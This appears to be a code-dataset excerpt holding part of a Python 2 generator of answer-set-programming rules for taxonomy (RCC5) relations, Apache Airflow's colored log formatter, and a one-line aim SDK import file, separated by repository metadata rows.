"pie($r, A, 2) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), in($y, X), ix.\n"\
"ir(X, $r) :- in($x,X), out($y,X), pw.\n"\
"pie($r, A, 1) :- ir(X, A), out($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), out($x, X), in($y, X), ix.\n"\
"pie($r, A, 2) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), in($y, X), ix.\n"
ruleEx["includes"] = ":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"
rule["is_included_in"] =\
"ir(X, $r) :- out($x,X), in($y,X), pw.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), out($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), out($y, X), ix.\n"\
"pie($r, A, 2) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), in($y, X), ix.\n"
ruleEx["is_included_in"] =\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), out($x,X), in($y,X)} = 0, pw.\n"
rule["disjoint"] = "pie($r, A, 1) :- ir(X, A), out($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), out($x, X), in($y, X), ix.\n"\
"pie($r, A, 2) :- ir(X, A), in($x, X), out($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), out($y, X), ix.\n"\
"ir(X, $r) :- in($x,X), in($y,X).\n"
ruleEx[rcc5["disjoint"]] =\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), out($x,X), in($y,X)} = 0, pw.\n"
rule[rcc5["overlaps"]] =\
"pie($r, A, 1) :- ir(X, A), in($x, X), out($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), out($y, X), ix.\n"\
"pie($r, A, 2) :- ir(X, A), out($x, X), in($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), out($x, X), in($y, X), ix.\n"\
"pie($r, A, 3) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 3) :- vr(X, A), in($x, X), in($y, X), ix.\n"
ruleEx[rcc5["overlaps"]] =\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), out($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"
rule[rcc5["equals"] | rcc5["disjoint"]] =\
":- #count{X : vrs(X), in($x, X), out($y, X)} > 0, #count{Y : vrs(Y), out($x, Y), in($y, Y)} > 0.\n"\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y : vrs(Y), out($x, Y), in($y, Y)} = 0.\n"\
":- #count{X : vrs(X), in($x, X), in($y, X)} > 0, #count{Y : vrs(Y), out($x, Y), in($y, Y)} = 0.\n"\
":- #count{X : vrs(X), in($x, X), in($y, X)} = 0, #count{Y : vrs(Y), out($x, Y), in($y, Y)} > 0.\n"
rule[rcc5["equals"] | rcc5["is_included_in"]] =\
"ir(X, $r) :- in($x,X), out($y,X).\n"\
"ir(X, prod($r,R)) :- in($x,X), out3($y, X, R), ix.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"
ruleEx[rcc5["equals"] | rcc5["is_included_in"]] =\
"vr(X, $r) v ir(X, $r) :- out($x,X), in($y,X).\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"
rule[rcc5["equals"] | rcc5["includes"]] =\
"ir(X, $r) :- out($x,X), in($y,X).\n"\
"ir(X, prod($r,R)) :- out3($x, X, R), in($y,X), ix.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"
ruleEx[rcc5["equals"] | rcc5["includes"]] =\
"vr(X, $r) v ir(X, $r) :- in($x,X), out($y,X).\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"
rule[rcc5["is_included_in"] | rcc5["includes"]] =\
"ir(X, $r) :- in($x,X), out($y,X), vr(Y, _), in($y,Y), out($x,Y).\n"\
"ir(Y, $r) :- #count{X: vrs(X), in($x,X), out($y,X)} > 0, in($y,Y), out($x,Y).\n"
rule[rcc5["disjoint"] | rcc5["overlaps"] =\
"ir(X, $r) v vr(X, $r) :- in($x,X), in($y,X).\n"
ruleEx[rcc5["disjoint"] | rcc5["overlaps"] =\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($y,X), out($x,X)} = 0, pw.\n"
rule[rcc5["equals"] | rcc5["overlaps"]] =\
":- #count{X: vrs(X), in($x,X), out($y,X)} > 0, #count{Y: vrs(Y), in($y,Y), out($x,Y)} = 0, pw.\n"\
"pie($r, A, 1) :- ir(X, A), in($y, X), out($x, X), #count{Y: vr(Y, _), in($x,Y), out($y,Y)} > 0, ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), out($y, X), #count{Y: vr(Y, _), in($y,Y), out($x,Y)} > 0, ix.\n\n"\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, #count{Y: vrs(Y), in($y,Y), out($x,Y)} > 0, pw.\n"\
"pie($r, A, 2) :- ir(X, A), in($x, X), out($y, X), #count{Y: vr(Y, _), in($y,Y), out($x,Y)} > 0, ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), out($y, X), #count{Y: vr(Y, _), in($y,Y), out($x,Y)} > 0, ix.\n\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"\
"pie($r, A, 3) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 3) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"
rule[rcc5["is_included_in"] | rcc5["overlaps"]] =\
"vr(X, $r) v ir(X, $r) :- in($x,X), out($y,X).\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), out($x,X), in($y,X)} = 0, pw.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"\
"pie($r, A, 2) :- ir(X, A), out($x, X), in($y, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), out($x, X), in($y, X), ix.\n\n"
rule[rcc5["is_included_in"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), out($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} > 0, #count{Y: vrs(Y), out($y,Y), in($x,Y)} > 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, #count{Y: vrs(Y), out($y,Y), in($x,Y)} = 0, pw.\n"\
"pie($r, A, 1) :- ir(X, A), out($x, X), in($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), out($x, X), in($y, X), ix.\n\n"\
"pie($r, prod(A, B), 2) :- vr(X, A), in($x, X), in($y, X), vr(Y, B), out("+ name2 + ",Y), in($x,Y), ix.\n"\
"pie($r, A, 3) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 3) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"\
"c($r, A, 3) :- vr(X, A), in($x, X), out($y, X), ix.\n\n"
rule[rcc5["includes"] | rcc5["overlaps"]] =\
"vrs(X) v irs(X) :- out($x,X), in($y,X), pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"
rule[rcc5["includes"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), in($x,X), out($y,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} > 0, #count{Y: vrs(Y), in($y,Y), out($x,Y)} > 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($y,X)} = 0, #count{Y: vrs(Y), in($y,Y), out($x,Y)} = 0, pw.\n"\
"pie($r, A, 1) :- ir(X, A), in($x, X), out($y, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), in($x, X), out($y, X), ix.\n\n"\
"pie($r, prod(A, B), 2) :- vr(X, A), in($x, X), in($y, X), vr(Y, B), in("+ name2 + ",Y), out($x,Y), ix.\n"\
"pie($r, A, 3) :- ir(X, A), in($x, X), in($y, X), ix.\n"\
"c($r, A, 3) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"\
"c($r, A, 3) :- vr(X, A), out($x, X), in($y, X), ix.\n\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["equals"]] =\
"vr(X, $r) v ir(X, $r) :- out($x,X), in($y,X).\n"\
"vr(X, $r) v ir(X, $r) :- in($x,X), out($y,X).\n"\
":- #count{X: vrs(X), in($x,X), out($y, X)} > 0, #count{Y: vrs(Y), out($x,Y), in($y, Y)} > 0.\n"\
":- #count{X: vrs(X), in($x,X), in($y, X)} = 0.\n\n"
rule[rcc5["is_included_in"] | rcc5["equals"] | rcc5["overlaps"]] =\
":- #count{X: vrs(X), in($x,X), out($y, X)} > 0, #count{Y: vrs(Y), out($x,Y), in($y, Y)} = 0.\n"\
":- #count{X: vrs(X), in($x,X), in($y, X)} = 0.\n\n"
rule[rcc5["includes"] | rcc5["equals"] | rcc5["overlaps"]] =\
":- #count{X: vrs(X), in($x,X), out($y, X)} = 0, #count{Y: vrs(Y), out($x,Y), in($y, Y)} > 0.\n"\
":- #count{X: vrs(X), in($x,X), in($y, X)} = 0.\n\n"
rule[rcc5["equals"] | rcc5["includes"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), out($x, X), in($y, X)} = 0, #count{Y: vrs(Y), in($x, Y), in($y, Y)} = 0.\n"\
":- #count{X: vrs(X), out($x, X), in($y, X)} > 0, #count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0.\n"\
":- #count{X: vrs(X), out($x, X), in($y, X)} > 0, #count{Y: vrs(Y), in($x, Y), in($y, Y)} = 0, #count{Z: vrs(Z), in($x, Z), out($y, Z)} = 0.\n\n"
rule[rcc5["equals"] | rcc5["is_included_in"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} = 0, #count{Y:vrs(Y), in($x, Y), in($y, Y)} = 0.\n"\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0, #count{Y:vrs(Y), in($x, Y), in($y, Y)} > 0.\n"\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0, #count{Y:vrs(Y), in($x, Y), in($y, Y)} = 0, #count{Z: vrs(Z), out($x, Z), in($y, Z)} = 0.\n\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["overlaps"]] =\
":- #count{X: vrs(X), in($x,X), out($y, X)} = 0, #count{Y: vrs(Y), out($x,Y), in($y, Y)} = 0, #count{Z: vrs(Z), in($x,Z), in($y, Z)} > 0.\n"\
":- #count{X: vrs(X), in($x,X), in($y, X)} = 0.\n\n"
rule[rcc5["disjoint"] | rcc5["equals"] | rcc5["overlaps"]] =\
":- #count{X : vrs(X), in($x, X), out($y, X)} > 0, #count{Y : vrs(Y), out($x, Y ), in($y, Y )} = 0.\n"\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y : vrs(Y), out($x, Y ), in($y, Y )} > 0.\n"\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y : vrs(Y), in($x, Y ), in($y, Y )} = 0, #count{Z : vrs(Z), out($x, Z), in($y, Z)} = 0.\n\n"
rule[rcc5["disjoint"] | rcc5["is_included_in"] | rcc5["overlaps"]] =\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y: vrs(Y), out($x, Y), in($y, Y)} = 0.\n"\
":- #count{X : vrs(X), in($x, X), out($y, X)} > 0, #count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0, #count{Z: vrs(Z), out($x, Z), in($y, Z)} = 0.\n\n"
rule[rcc5["includes"] | rcc5["disjoint"] | rcc5["overlaps"]] =\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y : vrs(Y), out($x, Y), in($y, Y)} = 0.\n"\
":- #count{X : vrs(X), in($x, X), out($y, X)} = 0, #count{Y : vrs(Y), in($x, Y), in($y, Y)} > 0, #count{Z : vrs(Z), out($x, Z), in($y, Z)} > 0.\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} = 0, #count{Y: vrs(Y), out($x, Y), in($y, Y)} = 0.\n"\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0, #count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0, #count{Z : vrs(Z), out($x, Z), in($y, Z)} > 0.\n\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["overlaps"] | rcc5["equals"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0,"\
"#count{Y: vrs(Y), in($x, Y), in($y, Y)} = 0,"\
"#count{Z: vrs(Z), out($x, Z), in($y, Z)} > 0.\n\n"
rule[rcc5["disjoint"] | rcc5["is_included_in"] | rcc5["overlaps"] | rcc5["equals"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0,"\
"#count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0,"\
"#count{Z: vrs(Z), out($x, Z), in($y, Z)} = 0.\n\n"
rule[rcc5["includes"] | rcc5["disjoint"] | rcc5["overlaps"] | rcc5["equals"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} = 0,"\
"#count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0,"\
"#count{Z: vrs(Z), out($x, Z), in($y, Z)} > 0.\n\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["disjoint"] | rcc5["equals"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} > 0,"\
"#count{Y: vrs(Y), in($x, Y), in($y, Y)} > 0,"\
"#count{Z: vrs(Z), out($x, Z), in($y, Z)} > 0.\n\n"
rule[rcc5["includes"] | rcc5["is_included_in"] | rcc5["overlaps"] | rcc5["disjoint"]] =\
":- #count{X: vrs(X), in($x, X), out($y, X)} = 0,"\
"#count{Y: vrs(Y), out($x, Y), in($y, Y)} = 0.\n\n"
rule[relation["+="]] =\ # lsum
":- #count{X: vrs(X), out($x,X), in($z,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($x,X), in($z,X)} = 0, pw.\n"\
":- #count{X: vrs(X), out($y,X), in($z,X)} = 0, pw.\n"\
":- #count{X: vrs(X), in($y,X), in($z,X)} = 0, pw.\n"\
"pie($r, A, 1) :- ir(X, A), out($x, X), in($z, X), ix.\n"\
"c($r, A, 1) :- vr(X, A), out($x, X), in($z, X), ix.\n\n"\
"pie($r, A, 2) :- ir(X, A), in($x, X), in($z, X), ix.\n"\
"c($r, A, 2) :- vr(X, A), in($x, X), in($z, X), ix.\n\n"\
"pie($r, A, 3) :- ir(X, A), out($y, X), in($z, X), ix.\n"\
"c($r, A, 3) :- vr(X, A), out($y, X), in($z, X), ix.\n\n"\
"pie($r, A, 4) :- ir(X, A), in($y, X), in($z, X), ix.\n"\
"c($r, A, 4) :- vr(X, A), in($y, X), in($z, X), ix.\n\n"\
"ir(X, $r) :- in($x,X), out($z,X), pw.\n"\
"ir(X, $r) :- in($y,X), out($z,X), pw.\n"
elif self.relations == relation["=-"]: # rdiff
name3 = self.taxon3.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($x,X), in($y,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($x,X), in($y,X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in($y,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in($y,X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($x,X): in($y,X)]0.\n"
result += ":- [vrs(X): in($x,X): in($y,X)]0.\n"
result += ":- [vrs(X): out($z,X): in($y,X)]0.\n"
result += ":- [vrs(X): in($z,X): in($y,X)]0.\n"
result += "pie($r, A, 1) :- ir(X, A), out($x, X), in($y, X), ix.\n"
result += "c($r, A, 1) :- vr(X, A), out($x, X), in($y, X), ix.\n\n"
result += "pie($r, A, 2) :- ir(X, A), in($x, X), in($y, X), ix.\n"
result += "c($r, A, 2) :- vr(X, A), in($x, X), in($y, X), ix.\n\n"
result += "pie($r, A, 3) :- ir(X, A), out($z, X), in($y, X), ix.\n"
result += "c($r, A, 3) :- vr(X, A), out($z, X), in($y, X), ix.\n\n"
result += "pie($r, A, 4) :- ir(X, A), in($z, X), in($y, X), ix.\n"
result += "c($r, A, 4) :- vr(X, A), in($z, X), in($y, X), ix.\n\n"
result += "ir(X, $r) :- in($x,X), out($y,X).\n"
result += "ir(X, $r) :- in($z,X), out($y,X).\n"
elif self.relations == relation["+3="]:
name3 = self.taxon3.dlvName()
name4 = self.taxon4.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($x,X), in(" + name4 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($x,X), in(" + name4 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), out($y,X), in(" + name4 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($y,X), in(" + name4 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in(" + name4 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in(" + name4 + ",X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($x,X): in(" + name4 + ",X)]0.\n"
result += ":- [vrs(X): in($x,X): in(" + name4 + ",X)]0.\n"
result += ":- [vrs(X): out($y,X): in(" + name4 + ",X)]0.\n"
result += ":- [vrs(X): in($y,X): in(" + name4 + ",X)]0.\n"
result += ":- [vrs(X): out($z,X): in(" + name4 + ",X)]0.\n"
result += ":- [vrs(X): in($z,X): in(" + name4 + ",X)]0.\n"
result += "ir(X, $r) :- in($x,X), out(" + name4 + ",X).\n"
result += "ir(X, $r) :- in($y,X), out(" + name4 + ",X).\n"
result += "ir(X, $r) :- in($z,X), out(" + name4 + ",X).\n"
result += "ir(X, $r) :- out(" +name1 + ",X), out($y,X),\
out($z,X), in(" + name4 + ",X).\n"
elif self.relations == relation["+4="]:
name3 = self.taxon3.dlvName()
name4 = self.taxon4.dlvName()
name5 = self.taxon5.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($x,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($x,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), out($y,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($y,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), out(" + name4 + ",X), in(" + name5 + ",X)} = 0.\n"
result += ":- #count{X: vrs(X), in(" + name4 + ",X), in(" + name5 + ",X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($x,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): in($x,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): out($y,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): in($y,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): out($z,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): in($z,X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): out(" + name4 + ",X): in(" + name5 + ",X)]0.\n"
result += ":- [vrs(X): in(" + name4 + ",X): in(" + name5 + ",X)]0.\n"
result += "ir(X, $r) :- in($x,X), out(" + name5 + ",X).\n"
result += "ir(X, $r) :- in($y,X), out(" + name5 + ",X).\n"
result += "ir(X, $r) :- in($z,X), out(" + name5 + ",X).\n"
result += "ir(X, $r) :- in(" + name4 + ",X), out(" + name5 + ",X).\n"
elif self.relations == relation["=+"] or self.relations == relation["-="]: # rsum and ldiff
name3 = self.taxon3.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in($x,X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): out($z,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($z,X): in($x,X)]0.\n"
result += "ir(X, $r) :- in($y,X), out($x,X).\n"
result += "ir(X, $r) :- in($z,X), out($x,X).\n"
elif self.relations == relation["=3+"]:
name3 = self.taxon3.dlvName()
name4 = self.taxon4.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out(" + name4 + ",X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in(" + name4 + ",X), in($x,X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): out($z,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($z,X): in($x,X)]0.\n"
result += ":- [vrs(X): out(" + name4 + ",X): in($x,X)]0.\n"
result += ":- [vrs(X): in(" + name4 + ",X): in($x,X)]0.\n"
result += "ir(X, $r) :- in($y,X), out($x,X).\n"
result += "ir(X, $r) :- in($z,X), out($x,X).\n"
result += "ir(X, $r) :- in(" + name4 + ",X), out($x,X).\n"
elif self.relations == relation["=4+"]:
name3 = self.taxon3.dlvName()
name4 = self.taxon4.dlvName()
name5 = self.taxon5.dlvName()
if reasoner[rnr] == reasoner["dlv"]:
result = ":- #count{X: vrs(X), out($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($y,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out($z,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in($z,X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out(" + name4 + ",X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in(" + name4 + ",X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), out(" + name5 + ",X), in($x,X)} = 0.\n"
result += ":- #count{X: vrs(X), in(" + name5 + ",X), in($x,X)} = 0.\n"
elif reasoner[rnr] == reasoner["gringo"]:
result = ":- [vrs(X): out($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($y,X): in($x,X)]0.\n"
result += ":- [vrs(X): out($z,X): in($x,X)]0.\n"
result += ":- [vrs(X): in($z,X): in($x,X)]0.\n"
result += ":- [vrs(X): out(" + name4 + ",X): in($x,X)]0.\n"
result += ":- [vrs(X): in(" + name4 + ",X): in($x,X)]0.\n"
result += ":- [vrs(X): out(" + name5 + ",X): in($x,X)]0.\n"
result += ":- [vrs(X): in(" + name5 + ",X): in($x,X)]0.\n"
result += "ir(X, $r) :- in($y,X), out($x,X).\n"
result += "ir(X, $r) :- in($z,X), out($x,X).\n"
result += "ir(X, $r) :- in(" + name4 + ",X), out($x,X).\n"
result += "ir(X, $r) :- in(" + name5 + ",X), out($x,X).\n"
else:
print "Relation ",self.relations," is not yet supported!!!!"
result = "\n"
elif encode[enc] & encode["direct"]:
prefix = "label($x, " + name2 +", "
result = ""
firstrel = True
if self.relations < relation["+="]:
if self.relations & rcc5["includes"] == rcc5["includes"]:
result = prefix + "in) "
firstrel = False
if self.relations & rcc5["is_included_in"] == rcc5["is_included_in"]:
if firstrel:
result = prefix + "ls) "
firstrel = False
else:
result += " v " + prefix + "ls) "
if self.relations & rcc5["overlaps"] == rcc5["overlaps"]:
if firstrel:
result = prefix + "ol) "
firstrel = False
else:
result += " v " + prefix + "ol) "
if self.relations & rcc5["disjoint"] == rcc5["disjoint"]:
if firstrel:
result = prefix + "ds) "
firstrel = False
else:
result += " v " + prefix + "ds) "
if self.relations & rcc5["equals"] == rcc5["equals"]:
if firstrel:
result = prefix + "eq) "
firstrel = False
else:
result += " v " + prefix + "eq) "
if not firstrel:
result += "."
elif self.relations == relation["+="]:
result = "sum(" + self.taxon3.dlvName() + ",$x,$y).\n"
elif self.relations == relation["=+"]:
result = "sum($x,$y," + self.taxon3.dlvName() + ").\n"
else:
raise Exception("Encoding:", enc, " is not supported !!")
return result
| 61.876984
| 169
| 0.415218
|
29a9a0f33428b7947202d40d46a5d24d1439afc7
| 3,032
|
py
|
Python
|
airflow/utils/log/colored_log.py
|
Ryan-Miao/airflow
|
a2aca8714fac014ed7da97229d7877f1bc6e5a59
|
[
"Apache-2.0"
] | 2
|
2020-10-12T05:21:27.000Z
|
2021-07-07T09:23:47.000Z
|
airflow/utils/log/colored_log.py
|
Ryan-Miao/airflow
|
a2aca8714fac014ed7da97229d7877f1bc6e5a59
|
[
"Apache-2.0"
] | 3
|
2021-03-11T06:46:16.000Z
|
2021-09-29T17:48:20.000Z
|
airflow/utils/log/colored_log.py
|
Ryan-Miao/airflow
|
a2aca8714fac014ed7da97229d7877f1bc6e5a59
|
[
"Apache-2.0"
] | 1
|
2019-12-09T08:41:32.000Z
|
2019-12-09T08:41:32.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Class responsible for colouring logs based on log level.
"""
import sys
from typing import Any, Union
from logging import LogRecord
from colorlog import TTYColoredFormatter
from termcolor import colored
ARGS = {"attrs": ["bold"]}
DEFAULT_COLORS = {
"DEBUG": "red",
"INFO": "",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "red",
}
class CustomTTYColoredFormatter(TTYColoredFormatter):
"""
Custom log formatter which extends `colorlog.TTYColoredFormatter`
by adding attributes to message arguments and coloring error
traceback.
"""
def __init__(self, *args, **kwargs):
kwargs["stream"] = sys.stdout or kwargs.get("stream")
kwargs["log_colors"] = DEFAULT_COLORS
super().__init__(*args, **kwargs)
@staticmethod
def _color_arg(arg: Any) -> Union[str, float, int]:
if isinstance(arg, (int, float)):
# In case of %d or %f formatting
return arg
return colored(str(arg), **ARGS) # type: ignore
def _color_record_args(self, record: LogRecord) -> LogRecord:
if isinstance(record.args, (tuple, list)):
record.args = tuple(self._color_arg(arg) for arg in record.args)
elif isinstance(record.args, dict):
# Case of logging.debug("a %(a)d b %(b)s", {'a':1, 'b':2})
record.args = {
key: self._color_arg(value) for key, value in record.args.items()
}
elif isinstance(record.args, str):
record.args = self._color_arg(record.args)
return record
def _color_record_traceback(self, record: LogRecord) -> LogRecord:
if record.exc_info:
# Cache the traceback text to avoid converting it multiple times
# (it's constant anyway)
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
record.exc_text = colored(record.exc_text, DEFAULT_COLORS["ERROR"])
return record
def format(self, record: LogRecord) -> str:
record = self._color_record_args(record)
record = self._color_record_traceback(record)
return super().format(record)
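# Illustrative usage sketch (not part of the original module): attach the
# formatter to a stream handler. The "%(log_color)s" token follows colorlog's
# format-string conventions; the logger name and message below are arbitrary.
if __name__ == "__main__":
    import logging

    handler = logging.StreamHandler(sys.stdout)
    handler.setFormatter(
        CustomTTYColoredFormatter("%(log_color)s%(levelname)s - %(message)s", stream=sys.stdout)
    )
    demo_logger = logging.getLogger("colored_log_demo")
    demo_logger.addHandler(handler)
    demo_logger.setLevel(logging.DEBUG)
    demo_logger.warning("value is %s", 42)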
| 35.670588
| 83
| 0.661939
|
fe5093485bde89aced3aa481dd4f347f672ee9f9
| 45
|
py
|
Python
|
aim/sdk/types.py
|
avkudr/aim
|
5961f31d358929287986ace09c73310886a94704
|
[
"Apache-2.0"
] | 2,195
|
2020-01-23T03:08:11.000Z
|
2022-03-31T14:32:19.000Z
|
aim/sdk/types.py
|
deepanprabhu/aim
|
c00d8ec7bb2d9fd230a9430b516ca90cdb8072cb
|
[
"Apache-2.0"
] | 696
|
2020-02-08T21:55:45.000Z
|
2022-03-31T16:52:22.000Z
|
aim/sdk/types.py
|
deepanprabhu/aim
|
c00d8ec7bb2d9fd230a9430b516ca90cdb8072cb
|
[
"Apache-2.0"
] | 150
|
2020-03-27T10:44:25.000Z
|
2022-03-21T21:29:41.000Z
|
from aim.storage.types import * # noqa F401
| 22.5
| 44
